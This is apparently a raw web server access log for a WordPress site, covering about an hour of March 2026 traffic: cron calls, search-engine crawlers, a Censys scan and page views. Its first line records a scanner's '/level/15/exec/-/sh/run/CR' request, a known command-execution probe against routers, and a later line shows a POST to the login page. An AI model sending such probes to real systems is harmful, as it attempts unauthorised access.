194.50.16.36 - - [16/Mar/2026:11:46:50 +0800] "GET /level/15/exec/-/sh/run/CR HTTP/1.1" 404 31365 "-" "libwww-perl/6.81"
36.133.115.36 - - [16/Mar/2026:11:55:16 +0800] "POST /wp-cron.php?doing_wp_cron=1773633316.4774250984191894531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
152.53.248.237 - - [16/Mar/2026:11:55:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
152.53.248.237 - - [16/Mar/2026:11:55:17 +0800] "GET / HTTP/1.1" 200 35258 "http://36.133.115.36" "Go-http-client/1.1"
36.133.115.36 - - [16/Mar/2026:11:59:08 +0800] "POST /wp-cron.php?doing_wp_cron=1773633548.8321290016174316406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
176.65.149.234 - - [16/Mar/2026:11:59:09 +0800] "GET / HTTP/1.1" 200 157152 "-" "Mozilla/1.0"
36.133.115.36 - - [16/Mar/2026:12:15:41 +0800] "POST /wp-cron.php?doing_wp_cron=1773634541.2673509120941162109375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.83.139.21 - - [16/Mar/2026:12:15:41 +0800] "POST /wp-login.php HTTP/1.1" 200 9491 "-" "Mozilla/5.0"
36.133.115.36 - - [16/Mar/2026:12:24:23 +0800] "POST /wp-cron.php?doing_wp_cron=1773635063.1503589153289794921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
216.244.66.245 - - [16/Mar/2026:12:24:23 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
15.235.96.34 - - [16/Mar/2026:12:24:47 +0800] "GET / HTTP/1.1" 200 35258 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.245 - - [16/Mar/2026:12:30:40 +0800] "GET /industry HTTP/1.1" 200 93315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [16/Mar/2026:12:54:41 +0800] "POST /wp-cron.php?doing_wp_cron=1773636881.0665960311889648437500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
221.206.37.110 - - [16/Mar/2026:12:54:41 +0800] "GET /contacts/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
221.206.37.110 - - [16/Mar/2026:12:54:41 +0800] "GET http://cqqizhou.com/contacts HTTP/1.1" 200 21758 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Mar/2026:12:57:10 +0800] "POST /wp-cron.php?doing_wp_cron=1773637030.1585369110107421875000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.94.138.167 - - [16/Mar/2026:12:57:10 +0800] "GET /security.txt HTTP/1.1" 200 19856 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.167 - - [16/Mar/2026:12:57:56 +0800] "GET /qlkur__rrusf HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [16/Mar/2026:13:10:31 +0800] "POST /wp-cron.php?doing_wp_cron=1773637831.5872750282287597656250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
216.244.66.245 - - [16/Mar/2026:13:10:31 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [16/Mar/2026:13:12:53 +0800] "POST /wp-cron.php?doing_wp_cron=1773637972.9616370201110839843750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
